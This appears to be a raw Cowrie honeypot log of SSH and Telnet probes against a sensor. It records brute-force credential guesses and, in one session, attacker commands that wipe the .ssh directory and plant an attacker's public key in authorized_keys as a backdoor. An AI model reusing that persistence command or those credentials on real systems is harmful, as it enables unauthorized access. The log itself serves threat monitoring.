{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:06:01.346415Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.login.success","username":"root","password":"aaaaaa","message":"login attempt [root/aaaaaa] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:06:02.050373Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:06:02.435503Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:06:02.436289Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:06:02.437464Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:06:02.604752Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:06:03.015078Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:06:03.015896Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:06:03.183954Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:06:03.184944Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.session.connect","src_ip":"177.229.197.38","src_port":47354,"dst_ip":"1.2.3.4","dst_port":22,"session":"efe03d1f6133","protocol":"ssh","message":"New connection: 177.229.197.38:47354 (1.2.3.4:22) [session: efe03d1f6133]","sensor":"my-vps","timestamp":"2025-08-26T10:06:03.352891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:06:03.353699Z","src_ip":"177.229.197.38","session":"efe03d1f6133"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:06:03.524984Z","src_ip":"177.229.197.38","session":"efe03d1f6133"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:06:04.249972Z","src_ip":"177.229.197.38","session":"efe03d1f6133"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:06:05.423354Z","src_ip":"177.229.197.38","session":"efe03d1f6133"}
{"eventid":"cowrie.session.connect","src_ip":"177.229.197.38","src_port":47356,"dst_ip":"1.2.3.4","dst_port":22,"session":"550d894338ac","protocol":"ssh","message":"New connection: 177.229.197.38:47356 (1.2.3.4:22) [session: 550d894338ac]","sensor":"my-vps","timestamp":"2025-08-26T10:06:05.590106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:06:05.591227Z","src_ip":"177.229.197.38","session":"550d894338ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:06:05.758250Z","src_ip":"177.229.197.38","session":"550d894338ac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:06:06.464729Z","src_ip":"177.229.197.38","session":"550d894338ac"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:06:06.634069Z","src_ip":"177.229.197.38","session":"550d894338ac"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:06:06.634979Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":42100,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fb29577bd11","protocol":"ssh","message":"New connection: 196.251.86.249:42100 (1.2.3.4:22) [session: 2fb29577bd11]","sensor":"my-vps","timestamp":"2025-08-26T10:06:39.338585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:06:40.241679Z","src_ip":"196.251.86.249","session":"2fb29577bd11"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:06:40.242479Z","src_ip":"196.251.86.249","session":"2fb29577bd11"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"654321","message":"login attempt [oracle/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:06:43.088876Z","src_ip":"196.251.86.249","session":"2fb29577bd11"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:06:44.660482Z","src_ip":"196.251.86.249","session":"2fb29577bd11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61848,"dst_ip":"1.2.3.4","dst_port":22,"session":"63f7d7774fac","protocol":"ssh","message":"New connection: 212.227.235.229:61848 (1.2.3.4:22) [session: 63f7d7774fac]","sensor":"my-vps","timestamp":"2025-08-26T10:06:46.637602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T10:06:47.861168Z","src_ip":"212.227.235.229","session":"63f7d7774fac"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T10:06:48.850244Z","src_ip":"212.227.235.229","session":"63f7d7774fac"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:06:55.550865Z","src_ip":"212.227.235.229","session":"63f7d7774fac"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":43544,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0e34ace0eed","protocol":"ssh","message":"New connection: 196.251.86.249:43544 (1.2.3.4:22) [session: f0e34ace0eed]","sensor":"my-vps","timestamp":"2025-08-26T10:07:41.579769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:07:42.519209Z","src_ip":"196.251.86.249","session":"f0e34ace0eed"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:07:42.519871Z","src_ip":"196.251.86.249","session":"f0e34ace0eed"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123","message":"login attempt [oracle/123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:07:44.824268Z","src_ip":"196.251.86.249","session":"f0e34ace0eed"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:07:46.485325Z","src_ip":"196.251.86.249","session":"f0e34ace0eed"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58162,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4e1fc422eab","protocol":"ssh","message":"New connection: 217.72.205.35:58162 (1.2.3.4:22) [session: a4e1fc422eab]","sensor":"my-vps","timestamp":"2025-08-26T10:07:51.375994Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:07:51.377033Z","src_ip":"217.72.205.35","session":"a4e1fc422eab"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":44642,"dst_ip":"1.2.3.4","dst_port":22,"session":"df8e22fea5ee","protocol":"ssh","message":"New connection: 196.251.86.249:44642 (1.2.3.4:22) [session: df8e22fea5ee]","sensor":"my-vps","timestamp":"2025-08-26T10:08:44.566073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:08:44.788229Z","src_ip":"196.251.86.249","session":"df8e22fea5ee"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:08:44.788990Z","src_ip":"196.251.86.249","session":"df8e22fea5ee"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"321","message":"login attempt [oracle/321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:08:46.319142Z","src_ip":"196.251.86.249","session":"df8e22fea5ee"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:08:48.026314Z","src_ip":"196.251.86.249","session":"df8e22fea5ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57491,"dst_ip":"1.2.3.4","dst_port":23,"session":"97e5e03c0128","protocol":"telnet","message":"New connection: 212.227.125.160:57491 (1.2.3.4:23) [session: 97e5e03c0128]","sensor":"my-vps","timestamp":"2025-08-26T10:09:37.099902Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":45258,"dst_ip":"1.2.3.4","dst_port":22,"session":"008a6b9d1682","protocol":"ssh","message":"New connection: 196.251.86.249:45258 (1.2.3.4:22) [session: 008a6b9d1682]","sensor":"my-vps","timestamp":"2025-08-26T10:09:47.018406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:09:47.540845Z","src_ip":"196.251.86.249","session":"008a6b9d1682"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:09:47.548839Z","src_ip":"196.251.86.249","session":"008a6b9d1682"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"test","message":"login attempt [oracle/test] failed","sensor":"my-vps","timestamp":"2025-08-26T10:09:50.025490Z","src_ip":"196.251.86.249","session":"008a6b9d1682"}
{"eventid":"cowrie.session.closed","duration":13.120845794677734,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:09:50.220680Z","src_ip":"212.227.125.160","session":"97e5e03c0128"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:09:51.769068Z","src_ip":"196.251.86.249","session":"008a6b9d1682"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.116.173","src_port":14330,"dst_ip":"1.2.3.4","dst_port":22,"session":"21931740e8a1","protocol":"ssh","message":"New connection: 14.103.116.173:14330 (1.2.3.4:22) [session: 21931740e8a1]","sensor":"my-vps","timestamp":"2025-08-26T10:10:04.428794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:10:04.429909Z","src_ip":"14.103.116.173","session":"21931740e8a1"}
